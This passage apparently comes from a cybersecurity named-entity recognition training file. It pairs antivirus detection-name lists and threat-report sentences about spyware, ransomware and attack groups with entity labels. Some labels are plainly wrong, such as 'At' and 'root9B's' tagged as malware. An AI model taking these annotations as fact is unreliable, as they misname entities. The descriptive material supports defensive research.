Trojan-PSW.Win32.Tepfer!O Trojan.Fareit.S467850 Trojan.Tepfer.Win32.85789 Trojan/Fareit.a Trojan.PWS.ZIY Win32.Trojan-PSW.Fareit.a Win32/PSW.Fareit.A BKDR_PONY.SM Win.Trojan.Fareit-403 Trojan.PWS.ZIY Trojan.Win32.Tepfer.dnnwuu Trojan.PWS.ZIY TrojWare.Win32.PWS.Fareit.GS Trojan.PWS.ZIY Trojan.PWS.Stealer.1932 BKDR_PONY.SM BehavesLike.Win32.ZBot.nh W32.Tepfer TR/PSW.Fareit.iloen Trojan[PSW]/Win32.Tepfer Trojan.Win32.PSW-Tepfer.92672 Trojan/Win32.Tepfer.R50650 
Trojan.PWS.ZIY BScope.Malware-Cryptor.Ponik Spyware.Pony Trj/Tepfer.D Trojan.Fareit Win32.Outbreak Win32.Trojan-Stealer.Zbot.AB Win32/Trojan.PSW.5cd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007315", "source": "cyner2_train"}} {"text": "A backdoor also known as: TSPY_DOWNLOADER_DD300501.UVPA Win32.Trojan.WisdomEyes.16070401.9500.9967 Infostealer.Donx TSPY_DOWNLOADER_DD300501.UVPA Trojan.Win32.VB.ckqm Trojan.VB.Win32.119679 BehavesLike.Win32.Sality.dm Worm.Win32.VB Trojan/VB.cvqf Trojan/Win32.VB Worm:Win32/Vberaspul.A Trojan.Heur.RX.E04E5F Trojan.Win32.VB.ckqm Trojan/Win32.VB.R85915 Trojan.VB Win32/AutoRun.VB.BDA Trojan.VB!nw7hcYRbBc8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007319", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_CLICKER.API W32/Trojan.HUCV-9091 TROJ_CLICKER.API Win.Trojan.Clicker-2623 Trojan.Win32.Click.ddmsji W32/Trojan2.GMLR Adware/Clicker.hjb TrojanDownloader:Win32/Valfroc.A Win32.Trojan.Clicker.Tbip W32/CLICKER.API!tr Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007321", "source": "cyner2_train"}} {"text": "Additionally , rootdaemon attempts to remove its own power usage statistics from Huawei phones ' SystemManager : Similarly , the malicious application probably attempts to minimize traces on Samsung phones by adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/apm_sp_status_of_apps.xml the following lines : And adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/com.samsung.android.securitylogagent_preferences.xml these lines instead : Data Collection and Exfiltration As mentioned , mike.jar equips the spyware with extensive collection capabilities , including : Retrieve a list of installed applications .", "spans": {"ORGANIZATION: Huawei": [[81, 87]], "ORGANIZATION: Samsung": [[191, 198]]}, "info": {"id": "cyner2_train_007322", "source": 
"cyner2_train"}} {"text": "Seeing this type of activity typically indicates that a particular ransomware will see much wider distribution and thus a larger amount of victims.", "spans": {"MALWARE: ransomware": [[67, 77]], "ORGANIZATION: a larger amount of victims.": [[120, 147]]}, "info": {"id": "cyner2_train_007324", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.LibPatcher!O W32/Trojan.KFBA-3961 Trojan.KillAV Win32/KillAV.EA RTKT_BUREY.C TrojWare.Win32.AntiAV.~B Trojan.MulDrop.30985 Downloader.LibPatcher.Win32.272 RTKT_BUREY.C BehavesLike.Win32.Backdoor.mc W32/Dldr.Age.41984.C Trojan[Downloader]/Win32.LibPatcher Trojan:Win32/Perkesh.A Trojan/Win32.KillAV.R5311 Win32.Trojan-downloader.Libpatcher.Dumk Trojan-Downloader.Win32.Perkesh W32/Perkesh.A!tr Win32/Virus.81b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007325", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.CKTNum.Trojan Virus.Win32.VB!O Virus.VB.Win32.90 W32.W.Mabezat.kZb9 Trojan.Heur.E2A0A7 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Worm.EJIG-5497 Trojan.Killfiles Win32/Disackt.B TROJ_VB.BHC Trojan.Win32.VB.mrc Virus.Win32.VB.bcfhqp Win32.Trojan.Vb.Eddp TrojWare.Win32.VB.AMN TROJ_VB.BHC BehavesLike.Win32.Downloader.mz W32/Worm.AWSI Virus.VB.bc W32/Overwriter.A Worm:Win32/Disackt.A Trojan.Win32.VB.mrc TScope.Trojan.VB Win32/VB.AMN Trojan.VB!eJU5EBjve4c Virus.Win32.VB W32/VB.AMN!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007326", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.49152.AYF Trojan.Dofoil.A Trojan/Kryptik.vgb Win32.Trojan.WisdomEyes.16070401.9500.9963 W32/Trojan.QQGJ-6488 Trojan.Win32.ULPM.eszgb Trojan.Yakes.Win32.1447 BehavesLike.Win32.Conficker.pc Trojan-Dropper.Win32.Injector W32/Kryptik.VIA!tr Trojan.Kazy.DABAF TrojanDropper:Win32/Finkmilt.C Trojan/Win32.Yakes.C144665 BScope.Trojan.Jorik.1421 Trojan.Kryptik!Y5cjjPIzRWk 
Bck/Qbot.AO Win32/Trojan.aeb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007327", "source": "cyner2_train"}} {"text": "At the end of December 2015, the network system of Ukrainian power companies was attacked by", "spans": {"MALWARE: At": [[0, 2]], "ORGANIZATION: network system of Ukrainian power companies": [[33, 76]]}, "info": {"id": "cyner2_train_007328", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Socks.agz Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan2.BFTZ HT_PHDET_FD042CB0.UVPM Trojan.Win32.Socks.utqwi Trojan.MulDrop7.51577 HT_PHDET_FD042CB0.UVPM BehavesLike.Win32.Dropper.jc W32/Trojan.NOBV-3130 TrojanDownloader.Small.sui Worm/Win32.Socks Trojan:Win32/Phdet.E Worm.Win32.A.Socks.93017 SScope.Worm.Socks.afv Worm.Socks!GMlFK48cpa8 W32/Kryptik.BD!tr Win32/Trojan.e0b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007330", "source": "cyner2_train"}} {"text": "Recently, WeipTech was analyzing suspicious Apple iOS tweaks reported by users and found over 225,000 valid Apple accounts with passwords stored on a server.", "spans": {"ORGANIZATION: WeipTech": [[10, 18]], "SYSTEM: Apple iOS": [[44, 53]], "ORGANIZATION: users": [[73, 78]], "SYSTEM: Apple accounts": [[108, 122]], "SYSTEM: server.": [[150, 157]]}, "info": {"id": "cyner2_train_007331", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.D676 Win32.Trojan.WisdomEyes.16070401.9500.9591 TR/Drop.Delfsnif.pmkbu TrojanDropper:Win32/Delfsnif.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007332", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.AphexLace!O TrojanDropper.AphexLace Dropper.AphexLace.Win32.1 Troj.W32.Inject!c Trojan/Dropper.AphexLace.b Trojan.Heur.EA2D6B TROJ_APHEXLACE.D Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Dropper.IHO Trojan.Dropper TROJ_APHEXLACE.D Trojan.Win32.Inject.vgog Trojan.Win32.AphexLace.glqv 
Dropper.AphexLace.17920 TrojWare.Win32.TrojanDropper.AphexLace.B Trojan.MulDrop.12656 Trojan-Dropper.Win32.Delf W32/Risk.JBWO-6048 TrojanDropper.AphexLace.b TR/Drop.AphexLace.B Trojan[Dropper]/Win32.Poisoner TrojanDropper:Win32/AphexLace.B Trojan.Win32.Inject.vgog Dropper/Win32.Xema.C57521 TrojanDropper.Poisoner Win32/TrojanDropper.AphexLace.B Win32.Trojan.Inject.Dypn Trojan.DR.AphexLace!M08TVuH6+oM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007333", "source": "cyner2_train"}} {"text": "Indicators related to the Sundown Exploit Kit", "spans": {"MALWARE: Sundown Exploit Kit": [[26, 45]]}, "info": {"id": "cyner2_train_007335", "source": "cyner2_train"}} {"text": "CopyCat is a fully developed malware with vast capabilities, including elevating privileges to root, establishing persistency, and to top it all - injecting code into Zygote.", "spans": {"MALWARE: CopyCat": [[0, 7]], "MALWARE: malware": [[29, 36]], "MALWARE: Zygote.": [[167, 174]]}, "info": {"id": "cyner2_train_007336", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.D9E5 TrojanSpy.Zbot Spyware.LokiBot Win.Packer.VbPack-0-6334882-0 Trojan-Spy.Win32.Zbot.yjsw Trojan.Win32.Zbot.etexpw Trojan.Win32.Z.Zbot.1081344 Trojan.PWS.Panda.12377 Trojan.Zbot.Win32.204854 BehavesLike.Win32.Fareit.tc Trojan.Win32.Injector TrojanSpy.Zbot.fkpq TR/AD.Zbot.cxjcv Trojan[Spy]/Win32.Zbot Trojan.Symmi.D1360F Trojan-Spy.Win32.Zbot.yjsw Trojan:Win32/Dukrid.A!bit Spyware/Win32.Zbot.R210148 TScope.Trojan.VB Trj/GdSda.A Win32.Trojan-spy.Zbot.Lqer TrojanSpy.Zbot!AasFtIJIGGs W32/Zbot.YJSW!tr Win32/Trojan.BO.553", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007337", "source": "cyner2_train"}} {"text": "The WordPress.org team has intervened and removed the plugin from the official WordPress Plugins repository.", "spans": {"ORGANIZATION: The WordPress.org team": [[0, 22]], "MALWARE: plugin": [[54, 60]], "ORGANIZATION: the official WordPress Plugins 
repository.": [[66, 108]]}, "info": {"id": "cyner2_train_007338", "source": "cyner2_train"}} {"text": "It is likely these spearphishes are generated via a builder - so attribution to an exact group of attackers may be incorrect.", "spans": {"THREAT_ACTOR: group of attackers": [[89, 107]]}, "info": {"id": "cyner2_train_007339", "source": "cyner2_train"}} {"text": "This campaign was found to be connected to the same party which previously targeted Vietnam Airlines and some other high profile targets possibly led by the Chinese 1937CN group.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "ORGANIZATION: Vietnam Airlines": [[84, 100]], "ORGANIZATION: high profile targets": [[116, 136]], "ORGANIZATION: the Chinese 1937CN group.": [[153, 178]]}, "info": {"id": "cyner2_train_007341", "source": "cyner2_train"}} {"text": "A backdoor also known as: I-Worm.Stator.A Worm/W32.Stator.62976 Email-Worm.Win32.Stator!O W32.Stator.A Worm.Stator.Win32.3 W32/Stator.worm I-Worm.Stator.A W32/Stator.A W32.Stator@mm Win32/Stator.62464.A WORM_STATOR.A Win.Worm.Stator-1 I-Worm.Stator.A Email-Worm.Win32.Stator.a I-Worm.Stator.A Trojan.Win32.Stator.jahi I-Worm.Win32.Stator I-Worm.Stator.A EmailWorm.Win32.Stator.a0 I-Worm.Stator.A Win32.HLLW.Plict WORM_STATOR.A BehavesLike.Win32.Downloader.kc Email-Worm.Win32.Stator.a W32/Stator.A I-Worm/Stator.a Worm[Email]/Win32.Stator Worm:Win32/Stator.A@mm Email-Worm.Win32.Stator.a Trojan/Win32.HDC.C40377 I-Worm.Stator.A Win32.HLLW.Stator.A I-Worm.Stator.62464 Win32/Stator.62464 Win32.Stator.B W32/Stator.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007342", "source": "cyner2_train"}} {"text": "encrypt its APK and shell code,", "spans": {"SYSTEM: APK": [[12, 15]]}, "info": {"id": "cyner2_train_007344", "source": "cyner2_train"}} {"text": "It looked like a typical backdoor that could be uploaded anywhere on a compromised server, not just in this particular plugin.", "spans": {"MALWARE: backdoor": [[25, 33]], "SYSTEM: 
compromised server,": [[71, 90]], "SYSTEM: plugin.": [[119, 126]]}, "info": {"id": "cyner2_train_007345", "source": "cyner2_train"}} {"text": "Emissary is related to the Elise Trojan and the Operation Lotus Blossom attack campaign, which prompted us to start collecting additional samples of Emissary.", "spans": {"MALWARE: Emissary": [[0, 8]], "MALWARE: the Elise Trojan": [[23, 39]], "THREAT_ACTOR: the Operation Lotus Blossom attack campaign,": [[44, 88]], "MALWARE: Emissary.": [[149, 158]]}, "info": {"id": "cyner2_train_007346", "source": "cyner2_train"}} {"text": "To quote the original article: It could be through attachments in spam messages, downloads from untrusted websites or something else.", "spans": {}, "info": {"id": "cyner2_train_007349", "source": "cyner2_train"}} {"text": "Command Action Unistxcr Restart the app dowsizetr Send the file stored in the /sdcard/DCIM/.dat/ directory to the C & C server Caspylistx Get a list of all hidden files in the /DCIM/.dat/ directory spxcheck Check whether call details are collected by the spyware S8p8y0 Delete call details stored by the spyware screXmex Take screenshots of the device screen Batrxiops Check battery status L4oclOCMAWS Fetch the victim 's location GUIFXB Launch the fake Facebook login page IODBSSUEEZ Send a file containing stolen Facebook credentials to the C & C server FdelSRRT Delete files containing stolen Facebook credentials chkstzeaw Launch Facebook LUNAPXER Launch apps according to the package name sent by the C & C server Gapxplister Get a list of all installed applications DOTRall8xxe Zip all the stolen files and store in the /DCIM/.dat/ directory Acouxacour Get a list of accounts on the victim 's device Fimxmiisx Open the camera Scxreexcv4 Capture an image micmokmi8x Capture audio Yufsssp Get latitude and longitude GExCaalsss7 Get call logs PHOCAs7 Call phone numbers sent by the C & C server Gxextsxms Get a list of inbox SMS messages Msppossag Send SMS with message body sent by the C & C server 
Getconstactx Get a list of all contacts Rinxgosa Play a ringtone bithsssp64 Execute commands sent by the C & C server DOWdeletx Deletes the file specified by the C & C server Deldatall8 Delete all files stored in the /sdcard/DCIM/.dat/ directory We do n't have the space to cover all of the commands , but let 's take a look at some of the major ones .", "spans": {"SYSTEM: Facebook": [[454, 462], [515, 523], [596, 604], [634, 642]]}, "info": {"id": "cyner2_train_007351", "source": "cyner2_train"}} {"text": "It has been the subject of many analysis reports, including those describing targeted espionage campaigns like Operation Night Dragon and the GhostNet attacks on Tibet.", "spans": {"THREAT_ACTOR: targeted espionage campaigns": [[77, 105]], "THREAT_ACTOR: Operation Night Dragon": [[111, 133]], "MALWARE: GhostNet": [[142, 150]]}, "info": {"id": "cyner2_train_007353", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Miner Troj.W32.Miner!c Trojan.MulDrop7.60223 TR/Muldrop.jzijj Trojan.Win32.Miner.tjvn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007354", "source": "cyner2_train"}} {"text": "The threat actor's campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.", "spans": {"THREAT_ACTOR: The threat actor's campaigns": [[0, 28]], "ORGANIZATION: high-profile North American and European government officials": [[49, 110]], "ORGANIZATION: CEOs": [[122, 126]], "ORGANIZATION: companies": [[140, 149]], "ORGANIZATION: celebrities": [[154, 165]], "ORGANIZATION: recorded": [[188, 196]]}, "info": {"id": "cyner2_train_007355", "source": "cyner2_train"}} {"text": "The earliest evidence obtained shows it has been in use since at least November 2016.", "spans": {}, "info": {"id": "cyner2_train_007356", "source": "cyner2_train"}} {"text": "The hash listed in the Pastebin led us to a 
malicious Word document that had also been uploaded to a public sandbox.", "spans": {"ORGANIZATION: the Pastebin": [[19, 31]], "SYSTEM: a public sandbox.": [[99, 116]]}, "info": {"id": "cyner2_train_007357", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom/W32.Locky.48128 Exploit.Cve20151701 Win32.Trojan.WisdomEyes.16070401.9500.9999 Exploit.Win32.CVE-2015-1701.bd Exploit.Win32.CVE20151701.euekja Trojan.Win32.LockCrypt.48128.A Trojan.Encoder.12135 BehavesLike.Win32.Mydoom.pm W32/Trojan.JPLA-3344 Exploit.CVE-2015-1701.ar TR/AD.RansomHeur.fbqvj Exploit.W32.Cve!c Exploit.Win32.CVE-2015-1701.bd Ransom:Win32/LockCrypt.A!bit Trojan/Win32.Scar.R211760 Exploit.CVE-2015-1701 Ransom.DXXD Trj/GdSda.A Trojan.Win32.Filecoder Win32.Trojan-Ransom.LockCrypt.A Win32/Trojan.Exploit.3d9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007363", "source": "cyner2_train"}} {"text": "This is exactly what we saw in late October and early November 2016, when the espionage group Pawn Storm also known as Fancy Bear, APT28, Sofacy, and STRONTIUM ramped up its spear-phishing campaigns against various governments and embassies around the world.", "spans": {"THREAT_ACTOR: espionage group Pawn Storm": [[78, 104]], "THREAT_ACTOR: Fancy Bear, APT28, Sofacy,": [[119, 145]], "THREAT_ACTOR: STRONTIUM": [[150, 159]], "THREAT_ACTOR: spear-phishing campaigns": [[174, 198]], "ORGANIZATION: governments": [[215, 226]], "ORGANIZATION: embassies": [[231, 240]]}, "info": {"id": "cyner2_train_007364", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32!O W32.Etap W32/Etap.dr Win32.Trojan.WisdomEyes.16070401.9500.9929 W32.Simile Virus.Win32.Etap Win32.Etap.E Win32/Linux.Etap W32/Etap.dr Virus.Win32.Etap Backdoor/Hupigon.ish Virus/Win32.Etap Trojan.Kazy.D65E9 Virus.Win32.Etap Backdoor:Win32/Etap.dr Win32/Etap.E W32/Etap.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007365", "source": "cyner2_train"}} {"text": 
"Furthermore, each of the stages used different development platform and was obfuscated in a different way.", "spans": {}, "info": {"id": "cyner2_train_007366", "source": "cyner2_train"}} {"text": "Rather than simply copying the features that were present within the Zeus trojan as-is Floki Bot claims to feature several new capabilities making it an attractive tool for criminals.", "spans": {"MALWARE: Zeus trojan": [[69, 80]], "MALWARE: Floki Bot": [[87, 96]], "THREAT_ACTOR: criminals.": [[173, 183]]}, "info": {"id": "cyner2_train_007367", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Silva.447488 Worm.Keco W32.W.Silva.d!c W32/Silva.d W32/Silva.D W32.Silva@mm Trojan.Win32.Silva.envq Worm.Win32.Silva.D Win32.HLLW.Silva Worm.Win32.Silva W32/Silva.QGXV-8360 I-Worm/Silva.d Worm:Win32/Silva.D@mm Worm:Win32/Silva.D@mm Email-Worm.Keco W32/Keco.G.worm Win32/Silva.D Win32.Worm-email.Keco.Peze I-Worm.Silva!97fYr5ijFvQ W32/Silva.D@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007368", "source": "cyner2_train"}} {"text": "Below are a couple of images of the panel that the attacker would be utilizing.", "spans": {}, "info": {"id": "cyner2_train_007369", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.BHO.Delf.T Trojan.Win32.Delf!O Trojan.Lnkhyd.A7 Trojan.Delf.Win32.15794 Troj.W32.Delf.lV2h Win32/Delf.AXIT TROJ_DELF.PVC Win.Trojan.Delf-11211 Trojan.BHO.Delf.T Trojan.Win32.Delf.ssh Trojan.BHO.Delf.T Trojan.Win32.Delf.cjzwb Trojan.Win32.Delf.157696.J Trojan.BHO.Delf.T TROJ_DELF.PVC Trojan.Lnkhyd Trojan/Delf.mdz Trojan:Win32/Lnkhyd.A Trojan/Win32.Delf Trojan.BHO.Delf.T Trojan.Win32.Delf.ssh Trojan:Win32/Lnkhyd.A Trojan/Win32.Fides.R3508 Trojan.BHO.Delf.T TScope.Trojan.Delf Win32.Trojan.Delf.Ednr Trojan.Win32.BHO.R", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007370", "source": "cyner2_train"}} {"text": "Interaction with these servers is performed in two different threads.", 
"spans": {}, "info": {"id": "cyner2_train_007371", "source": "cyner2_train"}} {"text": "They use compromised e-mail accounts to distribute their malware widely and their targeting appears opportunistic rather than specific.", "spans": {"MALWARE: malware": [[57, 64]]}, "info": {"id": "cyner2_train_007373", "source": "cyner2_train"}} {"text": "A backdoor also known as: PUP.Riskware.Tool Trojan.Win32.Cindyc.wrlqe TR/DyCode.A.110 Backdoor/Cindyc.bv Win32.Troj.Undef.kcloud Trojan:Win32/DyCode.A Backdoor.Win32.A.Cindyc.141184 Backdoor/Win32.Cindyc Backdoor.Cindyc.adk Backdoor.Win32.Cindyc Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007374", "source": "cyner2_train"}} {"text": "Credit card industry giant Visa on Friday issued a security alert warning companies using point-of-sale devices made by Oracle s MICROS retail unit to double-check the machines for malicious software or unusual network activity, and to change passwords on the devices.", "spans": {"ORGANIZATION: Credit card industry": [[0, 20]], "ORGANIZATION: Visa": [[27, 31]], "ORGANIZATION: companies": [[74, 83]], "SYSTEM: point-of-sale devices": [[90, 111]], "ORGANIZATION: Oracle": [[120, 126]], "SYSTEM: MICROS retail unit": [[129, 147]], "SYSTEM: machines": [[168, 176]], "MALWARE: malicious software": [[181, 199]], "SYSTEM: devices.": [[260, 268]]}, "info": {"id": "cyner2_train_007376", "source": "cyner2_train"}} {"text": "The dropper family, referred to internally as PNG_dropper, was observed being used as a second stage tool in different targeted attacks.", "spans": {"MALWARE: The dropper family,": [[0, 19]], "MALWARE: second stage tool": [[88, 105]]}, "info": {"id": "cyner2_train_007377", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.StartPageCRTD.Win32.8798 Win32.Trojan.WisdomEyes.16070401.9500.9990 Trojan.Win32.Clicker!BT Trojan.MSIL.EzirizNetReactor TR/Dropper.MSIL.76348 TrojanClicker:MSIL/Balamid.B Trojan.Jatif.32 Trojan/Win32.FakeMS.R113384 
Trojan.Win32.Clicker!BT Win32/Trojan.Dropper.2f1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007378", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9589 TROJ_DELF.IVW Trojan-Downloader.Win32.Delf.acc Troj.Downloader.W32.Delf!c Win32.Trojan-downloader.Delf.Edoh TrojWare.Win32.TrojanDownloader.Delf.~ABI Trojan.DownLoader.46506 Trojan-Downloader.Win32.Delf.ACC TrojanDownloader.Delf.fqq Trojan[Downloader]/Win32.Delf Win32.TrojDownloader.Delf.ac.kcloud Trojan.Downloader.bGWcaOz2KakG Trojan.Win32.A.Downloader.34816.FA Trojan-Downloader.Win32.Delf.acc Trj/Banbra.FSU Win32/Trojan.Downloader.dac", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007379", "source": "cyner2_train"}} {"text": "It does this by leveraging the Android plugin technology.", "spans": {"SYSTEM: the Android plugin technology.": [[27, 57]]}, "info": {"id": "cyner2_train_007381", "source": "cyner2_train"}} {"text": "Trojan Ransom Xpan was created by an organized gang, which used targeted attacks via RDP that abused weak passwords and wrong implementations.", "spans": {"MALWARE: Trojan Ransom Xpan": [[0, 18]], "THREAT_ACTOR: organized gang,": [[37, 52]], "VULNERABILITY: RDP": [[85, 88]], "VULNERABILITY: weak passwords": [[101, 115]], "VULNERABILITY: wrong implementations.": [[120, 142]]}, "info": {"id": "cyner2_train_007384", "source": "cyner2_train"}} {"text": "The operators have used use a range of techniques to target Windows computers and Android phones with the apparent goal of penetrating the computers of well-connected individuals in the Syrian opposition.", "spans": {"THREAT_ACTOR: operators": [[4, 13]], "SYSTEM: Windows computers": [[60, 77]], "SYSTEM: Android phones": [[82, 96]], "SYSTEM: computers": [[139, 148]], "ORGANIZATION: individuals": [[167, 178]], "ORGANIZATION: Syrian opposition.": [[186, 204]]}, "info": {"id": "cyner2_train_007385", "source": "cyner2_train"}} {"text": "On the 
network traffic analysis end, post compromise activity results in some interesting but not unexpected activity.", "spans": {}, "info": {"id": "cyner2_train_007386", "source": "cyner2_train"}} {"text": "Based on this evidence we believe this new malware is likely targeting South Koreans.", "spans": {"MALWARE: malware": [[43, 50]]}, "info": {"id": "cyner2_train_007387", "source": "cyner2_train"}} {"text": "A series of malware attacks targeting users of cryptocurrency wallets has been identified by security firm Kaspersky, which has developed an anti-malware solution to detect and prevent such attacks in the future.", "spans": {"MALWARE: malware": [[12, 19]], "ORGANIZATION: users": [[38, 43]], "SYSTEM: cryptocurrency wallets": [[47, 69]], "ORGANIZATION: security firm Kaspersky,": [[93, 117]], "SYSTEM: anti-malware solution": [[141, 162]]}, "info": {"id": "cyner2_train_007388", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus/W32.Patched.P W32.Patched.QC1 Trojan.Razy.D19982 PE_PATCHED.SMB Win32.Trojan.ImPatch.a W32/Floxif.A PE_PATCHED.SMB Trojan.Win32.Patched.qc Troj.W32.Patched.lnCt Trojan.Starter.3187 W32/Floxif.A Trojan.Win32.Patched.qc Trojan.Patched.al W32/Patched.AL Virus.Win32.Loader.abd Trojan.Win32.Patched W32/Patched.AL!tr Virus.Win32.Patched.DG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007389", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesGBTOFAB.Trojan Trojan-Dropper.Win32.Dapato!O Trojan/Vilsel.bftr Trojan-Dropper.Win32.Dapato.bzqh Trojan.Win32.Vilsel.dktcmg Trojan.Vilsel.Win32.24133 Trojan-PWS.Win32.QQPass TrojanDropper.Dapato.jop Trojan/Win32.Vilsel Win32.Troj.Vilsel.kcloud Trojan-Dropper.Win32.Dapato.bzqh Trojan.Vilsel", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007393", "source": "cyner2_train"}} {"text": "Most users are pushing a variety of information stealers with the service.", "spans": {"THREAT_ACTOR: information stealers": [[36, 56]], 
"SYSTEM: service.": [[66, 74]]}, "info": {"id": "cyner2_train_007397", "source": "cyner2_train"}} {"text": "First, users cannot easily spot any malicious behavior since PowerShell runs in the background.", "spans": {"VULNERABILITY: cannot easily spot any malicious behavior": [[13, 54]], "VULNERABILITY: PowerShell runs in the background.": [[61, 95]]}, "info": {"id": "cyner2_train_007401", "source": "cyner2_train"}} {"text": "root9B's analysis determined that the adversary is using advanced memory-resident techniques to maintain persistence and avoid detection.", "spans": {"MALWARE: root9B's": [[0, 8]], "THREAT_ACTOR: adversary": [[38, 47]]}, "info": {"id": "cyner2_train_007403", "source": "cyner2_train"}} {"text": "The malware has a remote controlling function, and attackers sending these emails seem to attempt intruding into the targets' network using the malware.", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: attackers": [[51, 60]], "SYSTEM: network": [[126, 133]], "MALWARE: malware.": [[144, 152]]}, "info": {"id": "cyner2_train_007404", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Sality!O Ransom.Exxroute.A3 Trojan.Kryptik.Win32.1099877 Troj.Downloader.W32.Banload.l42y Ransom_CERBER.SM3B Win32.Trojan.Kryptik.bjm W32/Trojan.FUEH-0857 Backdoor.Trojan Ransom_CERBER.SM3B Trojan.Encoder.10103 BehavesLike.Win32.Cutwail.ph Trojan.Spora.mw TR/AD.Spora.svton Trojan[Ransom]/Win32.Spora Trojan.Symmi.DB88E Ransom:Win32/Spora.A Hoax.Spora Virus.Win32.VBInject", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007406", "source": "cyner2_train"}} {"text": "A backdoor also known as: BKDR_PIRPI.YE Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_PIRPI.YE Trojan.Heur.LP.E69C7F Trojan:Win32/Pirpi.O Win32.Backdoor.Backdoor.Hwmn Win32/Trojan.9b5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007407", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
TSPY_MAJIKPOS.SMA Trojan.Majikpos TSPY_MAJIKPOS.SMA Trojan.DownLoader23.50404 W32/Trojan.QKOU-4044 Trojan.MSIL.Krypt.2 TrojanSpy:MSIL/Majikpos.A Spyware/Win32.Majikpos.C1861368 Trj/GdSda.A PUA.BrowseSmart Win32/Trojan.d60", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007410", "source": "cyner2_train"}} {"text": "The DragonOK group has been actively launching attacks for years.", "spans": {"ORGANIZATION: The DragonOK group": [[0, 18]]}, "info": {"id": "cyner2_train_007411", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameMITL.Trojan RDN/Downloader.a!vq Win32.Trojan.WisdomEyes.16070401.9500.9883 Trojan.FakeAV Trojan.DownLoad.41552 BehavesLike.Win32.Backdoor.ch Trojan.Win32.Redosdru Trojan/PSW.WOW.amc TrojanDownloader:Win32/Induiba.A Trojan.Heur.RP.EEBC2E Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007414", "source": "cyner2_train"}} {"text": "By analyzing the TaskManager class we can see the new commands that are supported at this stage : As can be seen in the code snippet above , there are quite a lot of data collection tasks that are now available : Collect device info Track location Upload contacts information Upload sent and received SMS messages Upload images Upload video files Send recursive dirlist of the external storage Upload specific files Record audio using the microphone Record calls Use the camera to capture bursts of snapshots Those tasks can either run periodically , on event ( such as incoming call ) or when getting a command from the C & C server .", "spans": {}, "info": {"id": "cyner2_train_007415", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Kargatroj!O Trojan.Kargatroj.Win32.5 BKDR_DEPPEELS.A Win32.Trojan.WisdomEyes.16070401.9500.9993 W32/Trojan.FYPB-4329 Backdoor.Kargatroj BKDR_DEPPEELS.A Win.Trojan.Kargatroj-5 Trojan.Win32.Kargatroj.a Trojan.Win32.Kargatroj.zribt Trojan.Win32.A.Kargatroj.288256 Trojan.Click2.18984 
